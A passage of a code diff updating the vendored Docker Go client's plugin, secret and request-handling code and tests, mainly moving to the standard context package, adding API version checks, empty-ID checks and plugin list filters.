 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
 )
 
 func TestPluginInspectError(t *testing.T) {
@@ -24,6 +25,18 @@ func TestPluginInspectError(t *testing.T) {
 	}
 }
 
+func TestPluginInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.PluginInspectWithRaw(context.Background(), "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
+	}
+}
+
 func TestPluginInspect(t *testing.T) {
 	expectedURL := "/plugins/plugin_name"
 	client := &Client{
diff --git a/vendor/github.com/docker/docker/client/plugin_install.go b/vendor/github.com/docker/docker/client/plugin_install.go
index 3217c4cf39..13baa40a9b 100644
--- a/vendor/github.com/docker/docker/client/plugin_install.go
+++ b/vendor/github.com/docker/docker/client/plugin_install.go
@@ -1,6 +1,7 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"io"
 	"net/http"
@@ -9,13 +10,12 @@ import (
 	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
 )
 
 // PluginInstall installs a plugin
 func (cli *Client) PluginInstall(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) {
 	query := url.Values{}
-	if _, err := reference.ParseNamed(options.RemoteRef); err != nil {
+	if _, err := reference.ParseNormalizedNamed(options.RemoteRef); err != nil {
 		return nil, errors.Wrap(err, "invalid remote reference")
 	}
 	query.Set("remote", options.RemoteRef)
@@ -60,8 +60,8 @@ func (cli *Client) PluginInstall(ctx context.Context, name string, options types
 			return
 		}
 
-		err = cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0})
-		pw.CloseWithError(err)
+		enableErr := cli.PluginEnable(ctx, name, types.PluginEnableOptions{Timeout: 0})
+		pw.CloseWithError(enableErr)
 	}()
 	return pr, nil
 }
diff --git a/vendor/github.com/docker/docker/client/plugin_list.go b/vendor/github.com/docker/docker/client/plugin_list.go
index 88c480a3e1..ade1051a97 100644
--- a/vendor/github.com/docker/docker/client/plugin_list.go
+++ b/vendor/github.com/docker/docker/client/plugin_list.go
@@ -1,18 +1,29 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
+	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/filters"
 )
 
 // PluginList returns the installed plugins
-func (cli *Client) PluginList(ctx context.Context) (types.PluginsListResponse, error) {
+func (cli *Client) PluginList(ctx context.Context, filter filters.Args) (types.PluginsListResponse, error) {
 	var plugins types.PluginsListResponse
-	resp, err := cli.get(ctx, "/plugins", nil, nil)
+	query := url.Values{}
+
+	if filter.Len() > 0 {
+		filterJSON, err := filters.ToParamWithVersion(cli.version, filter)
+		if err != nil {
+			return plugins, err
+		}
+		query.Set("filters", filterJSON)
+	}
+	resp, err := cli.get(ctx, "/plugins", query, nil)
 	if err != nil {
-		return plugins, err
+		return plugins, wrapResponseError(err, resp, "plugin", "")
 	}
 
 	err = json.NewDecoder(resp.body).Decode(&plugins)
diff --git a/vendor/github.com/docker/docker/client/plugin_list_test.go b/vendor/github.com/docker/docker/client/plugin_list_test.go
index 173e4b87f5..7dc351dceb 100644
--- a/vendor/github.com/docker/docker/client/plugin_list_test.go
+++ b/vendor/github.com/docker/docker/client/plugin_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,7 +11,7 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/api/types/filters"
 )
 
 func TestPluginListError(t *testing.T) {
@@ -18,7 +19,7 @@ func TestPluginListError(t *testing.T) {
 		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
-	_, err := client.PluginList(context.Background())
+	_, err := client.PluginList(context.Background(), filters.NewArgs())
 	if err == nil || err.Error() != "Error response from daemon: Server error" {
 		t.Fatalf("expected a Server Error, got %v", err)
 	}
@@ -26,34 +27,81 @@ func TestPluginListError(t *testing.T) {
 
 func TestPluginList(t *testing.T) {
 	expectedURL := "/plugins"
-	client := &Client{
-		client: newMockClient(func(req *http.Request) (*http.Response, error) {
-			if !strings.HasPrefix(req.URL.Path, expectedURL) {
-				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
-			}
-			content, err := json.Marshal([]*types.Plugin{
-				{
-					ID: "plugin_id1",
-				},
-				{
-					ID: "plugin_id2",
-				},
-			})
-			if err != nil {
-				return nil, err
-			}
-			return &http.Response{
-				StatusCode: http.StatusOK,
-				Body:       ioutil.NopCloser(bytes.NewReader(content)),
-			}, nil
-		}),
-	}
 
-	plugins, err := client.PluginList(context.Background())
-	if err != nil {
-		t.Fatal(err)
+	enabledFilters := filters.NewArgs()
+	enabledFilters.Add("enabled", "true")
+
+	capabilityFilters := filters.NewArgs()
+	capabilityFilters.Add("capability", "volumedriver")
+	capabilityFilters.Add("capability", "authz")
+
+	listCases := []struct {
+		filters             filters.Args
+		expectedQueryParams map[string]string
+	}{
+		{
+			filters: filters.NewArgs(),
+			expectedQueryParams: map[string]string{
+				"all":     "",
+				"filter":  "",
+				"filters": "",
+			},
+		},
+		{
+			filters: enabledFilters,
+			expectedQueryParams: map[string]string{
+				"all":     "",
+				"filter":  "",
+				"filters": `{"enabled":{"true":true}}`,
+			},
+		},
+		{
+			filters: capabilityFilters,
+			expectedQueryParams: map[string]string{
+				"all":     "",
+				"filter":  "",
+				"filters": `{"capability":{"authz":true,"volumedriver":true}}`,
+			},
+		},
 	}
-	if len(plugins) != 2 {
-		t.Fatalf("expected 2 plugins, got %v", plugins)
+
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				content, err := json.Marshal([]*types.Plugin{
+					{
+						ID: "plugin_id1",
+					},
+					{
+						ID: "plugin_id2",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		plugins, err := client.PluginList(context.Background(), listCase.filters)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(plugins) != 2 {
+			t.Fatalf("expected 2 plugins, got %v", plugins)
+		}
 	}
 }
diff --git a/vendor/github.com/docker/docker/client/plugin_push.go b/vendor/github.com/docker/docker/client/plugin_push.go
index 1e5f963251..d20bfe8447 100644
--- a/vendor/github.com/docker/docker/client/plugin_push.go
+++ b/vendor/github.com/docker/docker/client/plugin_push.go
@@ -1,9 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"io"
-
-	"golang.org/x/net/context"
 )
 
 // PluginPush pushes a plugin to a registry
diff --git a/vendor/github.com/docker/docker/client/plugin_push_test.go b/vendor/github.com/docker/docker/client/plugin_push_test.go
index d9f70cdff8..20b23a1173 100644
--- a/vendor/github.com/docker/docker/client/plugin_push_test.go
+++ b/vendor/github.com/docker/docker/client/plugin_push_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestPluginPushError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/plugin_remove.go b/vendor/github.com/docker/docker/client/plugin_remove.go
index b017e4d348..8563bab0db 100644
--- a/vendor/github.com/docker/docker/client/plugin_remove.go
+++ b/vendor/github.com/docker/docker/client/plugin_remove.go
@@ -1,10 +1,10 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
 )
 
 // PluginRemove removes a plugin
@@ -16,5 +16,5 @@ func (cli *Client) PluginRemove(ctx context.Context, name string, options types.
 
 	resp, err := cli.delete(ctx, "/plugins/"+name, query, nil)
 	ensureReaderClosed(resp)
-	return err
+	return wrapResponseError(err, resp, "plugin", name)
 }
diff --git a/vendor/github.com/docker/docker/client/plugin_remove_test.go b/vendor/github.com/docker/docker/client/plugin_remove_test.go
index a15f1661f6..e6c76342ee 100644
--- a/vendor/github.com/docker/docker/client/plugin_remove_test.go
+++ b/vendor/github.com/docker/docker/client/plugin_remove_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,8 +10,6 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-
-	"golang.org/x/net/context"
 )
 
 func TestPluginRemoveError(t *testing.T) {
@@ -33,7 +32,7 @@ func TestPluginRemove(t *testing.T) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
 			}
 			if req.Method != "DELETE" {
-				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+				return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
 			}
 			return &http.Response{
 				StatusCode: http.StatusOK,
diff --git a/vendor/github.com/docker/docker/client/plugin_set.go b/vendor/github.com/docker/docker/client/plugin_set.go
index 3260d2a90d..dcf5752ca2 100644
--- a/vendor/github.com/docker/docker/client/plugin_set.go
+++ b/vendor/github.com/docker/docker/client/plugin_set.go
@@ -1,7 +1,7 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
-	"golang.org/x/net/context"
+	"context"
 )
 
 // PluginSet modifies settings for an existing plugin
diff --git a/vendor/github.com/docker/docker/client/plugin_set_test.go b/vendor/github.com/docker/docker/client/plugin_set_test.go
index 2450254463..2e97904b86 100644
--- a/vendor/github.com/docker/docker/client/plugin_set_test.go
+++ b/vendor/github.com/docker/docker/client/plugin_set_test.go
@@ -1,14 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
 	"strings"
 	"testing"
-
-	"golang.org/x/net/context"
 )
 
 func TestPluginSetError(t *testing.T) {
diff --git a/vendor/github.com/docker/docker/client/plugin_upgrade.go b/vendor/github.com/docker/docker/client/plugin_upgrade.go
index 95a4356b97..115cea945b 100644
--- a/vendor/github.com/docker/docker/client/plugin_upgrade.go
+++ b/vendor/github.com/docker/docker/client/plugin_upgrade.go
@@ -1,20 +1,22 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
-	"fmt"
+	"context"
 	"io"
 	"net/url"
 
 	"github.com/docker/distribution/reference"
 	"github.com/docker/docker/api/types"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
 )
 
 // PluginUpgrade upgrades a plugin
 func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types.PluginInstallOptions) (rc io.ReadCloser, err error) {
+	if err := cli.NewVersionError("1.26", "plugin upgrade"); err != nil {
+		return nil, err
+	}
 	query := url.Values{}
-	if _, err := reference.ParseNamed(options.RemoteRef); err != nil {
+	if _, err := reference.ParseNormalizedNamed(options.RemoteRef); err != nil {
 		return nil, errors.Wrap(err, "invalid remote reference")
 	}
 	query.Set("remote", options.RemoteRef)
@@ -33,5 +35,5 @@ func (cli *Client) PluginUpgrade(ctx context.Context, name string, options types
 
 func (cli *Client) tryPluginUpgrade(ctx context.Context, query url.Values, privileges types.PluginPrivileges, name, registryAuth string) (serverResponse, error) {
 	headers := map[string][]string{"X-Registry-Auth": {registryAuth}}
-	return cli.post(ctx, fmt.Sprintf("/plugins/%s/upgrade", name), query, privileges, headers)
+	return cli.post(ctx, "/plugins/"+name+"/upgrade", query, privileges, headers)
 }
diff --git a/vendor/github.com/docker/docker/client/request.go b/vendor/github.com/docker/docker/client/request.go
index ac05363655..a19d62aa52 100644
--- a/vendor/github.com/docker/docker/client/request.go
+++ b/vendor/github.com/docker/docker/client/request.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io"
@@ -15,7 +16,6 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/versions"
 	"github.com/pkg/errors"
-	"golang.org/x/net/context"
 	"golang.org/x/net/context/ctxhttp"
 )
 
@@ -24,6 +24,7 @@ type serverResponse struct {
 	body       io.ReadCloser
 	header     http.Header
 	statusCode int
+	reqURL     *url.URL
 }
 
 // head sends an http request to the docker API using the method HEAD.
@@ -31,12 +32,12 @@ func (cli *Client) head(ctx context.Context, path string, query url.Values, head
 	return cli.sendRequest(ctx, "HEAD", path, query, nil, headers)
 }
 
-// getWithContext sends an http request to the docker API using the method GET with a specific go context.
+// get sends an http request to the docker API using the method GET with a specific Go context.
 func (cli *Client) get(ctx context.Context, path string, query url.Values, headers map[string][]string) (serverResponse, error) {
 	return cli.sendRequest(ctx, "GET", path, query, nil, headers)
 }
 
-// postWithContext sends an http request to the docker API using the method POST with a specific go context.
+// post sends an http request to the docker API using the method POST with a specific Go context.
 func (cli *Client) post(ctx context.Context, path string, query url.Values, obj interface{}, headers map[string][]string) (serverResponse, error) {
 	body, headers, err := encodeBody(obj, headers)
 	if err != nil {
@@ -58,7 +59,7 @@ func (cli *Client) put(ctx context.Context, path string, query url.Values, obj i
 	return cli.sendRequest(ctx, "PUT", path, query, body, headers)
 }
 
-// put sends an http request to the docker API using the method PUT.
+// putRaw sends an http request to the docker API using the method PUT.
 func (cli *Client) putRaw(ctx context.Context, path string, query url.Values, body io.Reader, headers map[string][]string) (serverResponse, error) {
 	return cli.sendRequest(ctx, "PUT", path, query, body, headers)
 }
@@ -118,11 +119,15 @@ func (cli *Client) sendRequest(ctx context.Context, method, path string, query u
 	if err != nil {
 		return serverResponse{}, err
 	}
-	return cli.doRequest(ctx, req)
+	resp, err := cli.doRequest(ctx, req)
+	if err != nil {
+		return resp, err
+	}
+	return resp, cli.checkResponseErr(resp)
 }
 
 func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResponse, error) {
-	serverResp := serverResponse{statusCode: -1}
+	serverResp := serverResponse{statusCode: -1, reqURL: req.URL}
 
 	resp, err := ctxhttp.Do(ctx, cli.client, req)
 	if err != nil {
@@ -165,7 +170,7 @@ func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResp
 		// daemon on Windows where the daemon is listening on a named pipe
 		// `//./pipe/docker_engine, and the client must be running elevated.
 		// Give users a clue rather than the not-overly useful message
-		// such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.25/info:
+		// such as `error during connect: Get http://%2F%2F.%2Fpipe%2Fdocker_engine/v1.26/info:
 		// open //./pipe/docker_engine: The system cannot find the file specified.`.
 		// Note we can't string compare "The system cannot find the file specified" as
 		// this is localised - for example in French the error would be
@@ -179,35 +184,42 @@ func (cli *Client) doRequest(ctx context.Context, req *http.Request) (serverResp
 
 	if resp != nil {
 		serverResp.statusCode = resp.StatusCode
+		serverResp.body = resp.Body
+		serverResp.header = resp.Header
 	}
+	return serverResp, nil
+}
 
-	if serverResp.statusCode < 200 || serverResp.statusCode >= 400 {
-		body, err := ioutil.ReadAll(resp.Body)
-		if err != nil {
-			return serverResp, err
-		}
-		if len(body) == 0 {
-			return serverResp, fmt.Errorf("Error: request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), req.URL)
-		}
+func (cli *Client) checkResponseErr(serverResp serverResponse) error {
+	if serverResp.statusCode >= 200 && serverResp.statusCode < 400 {
+		return nil
+	}
 
-		var errorMessage string
-		if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) &&
-			resp.Header.Get("Content-Type") == "application/json" {
-			var errorResponse types.ErrorResponse
-			if err := json.Unmarshal(body, &errorResponse); err != nil {
-				return serverResp, fmt.Errorf("Error reading JSON: %v", err)
-			}
-			errorMessage = errorResponse.Message
-		} else {
-			errorMessage = string(body)
-		}
+	body, err := ioutil.ReadAll(serverResp.body)
+	if err != nil {
+		return err
+	}
+	if len(body) == 0 {
+		return fmt.Errorf("request returned %s for API route and version %s, check if the server supports the requested API version", http.StatusText(serverResp.statusCode), serverResp.reqURL)
+	}
 
-		return serverResp, fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage))
+	var ct string
+	if serverResp.header != nil {
+		ct = serverResp.header.Get("Content-Type")
 	}
 
-	serverResp.body = resp.Body
-	serverResp.header = resp.Header
-	return serverResp, nil
+	var errorMessage string
+	if (cli.version == "" || versions.GreaterThan(cli.version, "1.23")) && ct == "application/json" {
+		var errorResponse types.ErrorResponse
+		if err := json.Unmarshal(body, &errorResponse); err != nil {
+			return fmt.Errorf("Error reading JSON: %v", err)
+		}
+		errorMessage = errorResponse.Message
+	} else {
+		errorMessage = string(body)
+	}
+
+	return fmt.Errorf("Error response from daemon: %s", strings.TrimSpace(errorMessage))
 }
 
 func (cli *Client) addHeaders(req *http.Request, headers headers) *http.Request {
@@ -239,9 +251,9 @@ func encodeData(data interface{}) (*bytes.Buffer, error) {
 }
 
 func ensureReaderClosed(response serverResponse) {
-	if body := response.body; body != nil {
+	if response.body != nil {
 		// Drain up to 512 bytes and close the body to let the Transport reuse the connection
-		io.CopyN(ioutil.Discard, body, 512)
+		io.CopyN(ioutil.Discard, response.body, 512)
 		response.body.Close()
 	}
 }
diff --git a/vendor/github.com/docker/docker/client/request_test.go b/vendor/github.com/docker/docker/client/request_test.go
index 63908aec4b..fda4d88aa1 100644
--- a/vendor/github.com/docker/docker/client/request_test.go
+++ b/vendor/github.com/docker/docker/client/request_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"fmt"
 	"io/ioutil"
 	"net/http"
@@ -9,7 +10,7 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types"
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
 )
 
 // TestSetHostHeader should set fake host for local communications, set real host
@@ -44,10 +45,8 @@ func TestSetHostHeader(t *testing.T) {
 	}
 
 	for c, test := range testCases {
-		proto, addr, basePath, err := ParseHost(test.host)
-		if err != nil {
-			t.Fatal(err)
-		}
+		hostURL, err := ParseHostURL(test.host)
+		assert.NilError(t, err)
 
 		client := &Client{
 			client: newMockClient(func(req *http.Request) (*http.Response, error) {
@@ -62,19 +61,17 @@ func TestSetHostHeader(t *testing.T) {
 				}
 				return &http.Response{
 					StatusCode: http.StatusOK,
-					Body:       ioutil.NopCloser(bytes.NewReader(([]byte("")))),
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte(""))),
 				}, nil
 			}),
 
-			proto:    proto,
-			addr:     addr,
-			basePath: basePath,
+			proto:    hostURL.Scheme,
+			addr:     hostURL.Host,
+			basePath: hostURL.Path,
 		}
 
 		_, err = client.sendRequest(context.Background(), "GET", testURL, nil, nil, nil)
-		if err != nil {
-			t.Fatal(err)
-		}
+		assert.NilError(t, err)
 	}
 }
 
diff --git a/vendor/github.com/docker/docker/client/secret_create.go b/vendor/github.com/docker/docker/client/secret_create.go
index de8b041567..09fae82f2a 100644
--- a/vendor/github.com/docker/docker/client/secret_create.go
+++ b/vendor/github.com/docker/docker/client/secret_create.go
@@ -1,19 +1,20 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // SecretCreate creates a new Secret.
 func (cli *Client) SecretCreate(ctx context.Context, secret swarm.SecretSpec) (types.SecretCreateResponse, error) {
-	var headers map[string][]string
-
 	var response types.SecretCreateResponse
-	resp, err := cli.post(ctx, "/secrets/create", nil, secret, headers)
+	if err := cli.NewVersionError("1.25", "secret create"); err != nil {
+		return response, err
+	}
+	resp, err := cli.post(ctx, "/secrets/create", nil, secret, nil)
 	if err != nil {
 		return response, err
 	}
diff --git a/vendor/github.com/docker/docker/client/secret_create_test.go b/vendor/github.com/docker/docker/client/secret_create_test.go
index cb378c77ff..419bdbcbc6 100644
--- a/vendor/github.com/docker/docker/client/secret_create_test.go
+++ b/vendor/github.com/docker/docker/client/secret_create_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -11,12 +12,23 @@ import (
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
+func TestSecretCreateUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.24",
+		client:  &http.Client{},
+	}
+	_, err := client.SecretCreate(context.Background(), swarm.SecretSpec{})
+	assert.Check(t, is.Error(err, `"secret create" requires API version 1.25, but the Docker daemon API version is 1.24`))
+}
+
 func TestSecretCreateError(t *testing.T) {
 	client := &Client{
-		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 	_, err := client.SecretCreate(context.Background(), swarm.SecretSpec{})
 	if err == nil || err.Error() != "Error response from daemon: Server error" {
@@ -25,8 +37,9 @@ func TestSecretCreateError(t *testing.T) {
 }
 
 func TestSecretCreate(t *testing.T) {
-	expectedURL := "/secrets/create"
+	expectedURL := "/v1.25/secrets/create"
 	client := &Client{
+		version: "1.25",
 		client: newMockClient(func(req *http.Request) (*http.Response, error) {
 			if !strings.HasPrefix(req.URL.Path, expectedURL) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
diff --git a/vendor/github.com/docker/docker/client/secret_inspect.go b/vendor/github.com/docker/docker/client/secret_inspect.go
index f774576118..e8322f4589 100644
--- a/vendor/github.com/docker/docker/client/secret_inspect.go
+++ b/vendor/github.com/docker/docker/client/secret_inspect.go
@@ -1,23 +1,25 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"io/ioutil"
-	"net/http"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // SecretInspectWithRaw returns the secret information with raw data
 func (cli *Client) SecretInspectWithRaw(ctx context.Context, id string) (swarm.Secret, []byte, error) {
+	if err := cli.NewVersionError("1.25", "secret inspect"); err != nil {
+		return swarm.Secret{}, nil, err
+	}
+	if id == "" {
+		return swarm.Secret{}, nil, objectNotFoundError{object: "secret", id: id}
+	}
 	resp, err := cli.get(ctx, "/secrets/"+id, nil, nil)
 	if err != nil {
-		if resp.statusCode == http.StatusNotFound {
-			return swarm.Secret{}, nil, secretNotFoundError{id}
-		}
-		return swarm.Secret{}, nil, err
+		return swarm.Secret{}, nil, wrapResponseError(err, resp, "secret", id)
 	}
 	defer ensureReaderClosed(resp)
 
diff --git a/vendor/github.com/docker/docker/client/secret_inspect_test.go b/vendor/github.com/docker/docker/client/secret_inspect_test.go
index 423d986968..6c84799b17 100644
--- a/vendor/github.com/docker/docker/client/secret_inspect_test.go
+++ b/vendor/github.com/docker/docker/client/secret_inspect_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -10,12 +11,24 @@ import (
 	"testing"
 
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
+func TestSecretInspectUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.24",
+		client:  &http.Client{},
+	}
+	_, _, err := client.SecretInspectWithRaw(context.Background(), "nothing")
+	assert.Check(t, is.Error(err, `"secret inspect" requires API version 1.25, but the Docker daemon API version is 1.24`))
+}
+
 func TestSecretInspectError(t *testing.T) {
 	client := &Client{
-		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
 	_, _, err := client.SecretInspectWithRaw(context.Background(), "nothing")
@@ -26,18 +39,32 @@ func TestSecretInspectError(t *testing.T) {
 
 func TestSecretInspectSecretNotFound(t *testing.T) {
 	client := &Client{
-		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+		version: "1.25",
+		client:  newMockClient(errorMock(http.StatusNotFound, "Server error")),
 	}
 
 	_, _, err := client.SecretInspectWithRaw(context.Background(), "unknown")
-	if err == nil || !IsErrSecretNotFound(err) {
-		t.Fatalf("expected an secretNotFoundError error, got %v", err)
+	if err == nil || !IsErrNotFound(err) {
+		t.Fatalf("expected a secretNotFoundError error, got %v", err)
+	}
+}
+
+func TestSecretInspectWithEmptyID(t *testing.T) {
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			return nil, errors.New("should not make request")
+		}),
+	}
+	_, _, err := client.SecretInspectWithRaw(context.Background(), "")
+	if !IsErrNotFound(err) {
+		t.Fatalf("Expected NotFoundError, got %v", err)
 	}
 }
 
 func TestSecretInspect(t *testing.T) {
-	expectedURL := "/secrets/secret_id"
+	expectedURL := "/v1.25/secrets/secret_id"
 	client := &Client{
+		version: "1.25",
 		client: newMockClient(func(req *http.Request) (*http.Response, error) {
 			if !strings.HasPrefix(req.URL.Path, expectedURL) {
 				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
diff --git a/vendor/github.com/docker/docker/client/secret_list.go b/vendor/github.com/docker/docker/client/secret_list.go
index 7e9d5ec167..f6bf7ba470 100644
--- a/vendor/github.com/docker/docker/client/secret_list.go
+++ b/vendor/github.com/docker/docker/client/secret_list.go
@@ -1,21 +1,24 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
+	"context"
 	"encoding/json"
 	"net/url"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
 )
 
 // SecretList returns the list of secrets.
 func (cli *Client) SecretList(ctx context.Context, options types.SecretListOptions) ([]swarm.Secret, error) {
+	if err := cli.NewVersionError("1.25", "secret list"); err != nil {
+		return nil, err
+	}
 	query := url.Values{}
 
 	if options.Filters.Len() > 0 {
-		filterJSON, err := filters.ToParam(options.Filters)
+		filterJSON, err := filters.ToJSON(options.Filters)
 		if err != nil {
 			return nil, err
 		}
diff --git a/vendor/github.com/docker/docker/client/secret_list_test.go b/vendor/github.com/docker/docker/client/secret_list_test.go
index 1ac11cddb3..72323b055f 100644
--- a/vendor/github.com/docker/docker/client/secret_list_test.go
+++ b/vendor/github.com/docker/docker/client/secret_list_test.go
@@ -1,7 +1,8 @@
-package client
+package client // import "github.com/docker/docker/client"
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"fmt"
 	"io/ioutil"
@@ -12,12 +13,23 @@ import (
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
 	"github.com/docker/docker/api/types/swarm"
-	"golang.org/x/net/context"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
+func TestSecretListUnsupported(t *testing.T) {
+	client := &Client{
+		version: "1.24",
+		client:  &http.Client{},
+	}
+	_, err := client.SecretList(context.Background(), types.SecretListOptions{})
+	assert.Check(t, is.Error(err, `"secret list" requires API version 1.25, but the Docker daemon API version is 1.24`))
+}
+
 func TestSecretListError(t *testing.T) {
 	client := &Client{
-		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+		version: "1.25",
+		client:  newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
 	}
 
 	_, err := client.SecretList(context.Background(), types.SecretListOptions{})
@@ -27,7 +39,7 @@ func TestSecretListError(t *testing.T) {
 }
 
 func TestSecretList(t *testing.T) {
-	expectedURL := "/secrets"
+	expectedURL := "/v1.25/secrets"
 
 	filters := filters.NewArgs()
 	filters.Add("label", "label1")
@@ -54,6 +66,7 @@ func TestSecretList(t *testing.T) {
 	}
 	for _, listCase := range listCases {
 		client := &Client{
+			version: "1.25",
 			client: newMockClient(func(req *http.Request) (*http.Response, error) {
 				if !strings.HasPrefix(req.URL.Path, expectedURL) {
 					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
diff --git a/vendor/github.com/docker/docker/client/secret_remove.go b/vendor/github.com/docker/docker/client/secret_remove.go
index 1955b988a9..e9d5218293 100644
--- a/vendor/github.com/docker/docker/client/secret_remove.go
+++ b/vendor/github.com/docker/docker/client/secret_remove.go
@@ -1,10 +1,13 @@
-package client
+package client // import "github.com/docker/docker/client"
 
-import "golang.org/x/net/context"
+import "context"
 
 // SecretRemove removes a Secret.
 func (cli *Client) SecretRemove(ctx context.Context, id string) error {
+	if err := cli.NewVersionError("1.25", "secret remove"); err != nil {
+		return err
+	}
 	resp, err := cli.delete(ctx, "/secrets/"+id, nil, nil)
 	ensureReaderClosed(resp)
-	return err
+	return wrapResponseError(err, resp, "secret", id)
 }
